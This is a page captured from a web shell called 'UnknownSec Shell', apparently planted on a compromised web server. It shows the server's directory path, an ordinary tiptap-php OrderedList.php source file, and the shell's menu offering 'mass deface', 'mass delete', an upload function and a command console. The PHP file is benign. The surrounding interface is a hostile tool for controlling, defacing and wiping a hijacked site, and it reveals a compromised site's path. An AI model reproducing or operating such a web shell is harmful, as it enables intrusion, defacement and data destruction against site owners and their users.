shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
ueberdosis
/
tiptap-php
/
src
/
Nodes
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
OrderedList.php
<?php namespace Tiptap\Nodes; use Tiptap\Core\Node; use Tiptap\Utils\HTML; class OrderedList extends Node { public static $name = 'orderedList'; public function addOptions() { return [ 'HTMLAttributes' => [], ]; } public function parseHTML() { return [ [ 'tag' => 'ol', ], ]; } public function addAttributes() { return [ 'start' => [ 'parseHTML' => fn ($DOMNode) => (int) $DOMNode->getAttribute('start') ?: null, 'renderHTML' => fn ($attributes) => ($attributes->start ?? null) ? ['start' => $attributes->start] : null, ], ]; } public function renderHTML($node, $HTMLAttributes = []) { return ['ol', HTML::mergeAttributes($this->options['HTMLAttributes'], $HTMLAttributes), 0]; } }
© 2026 UnknownSec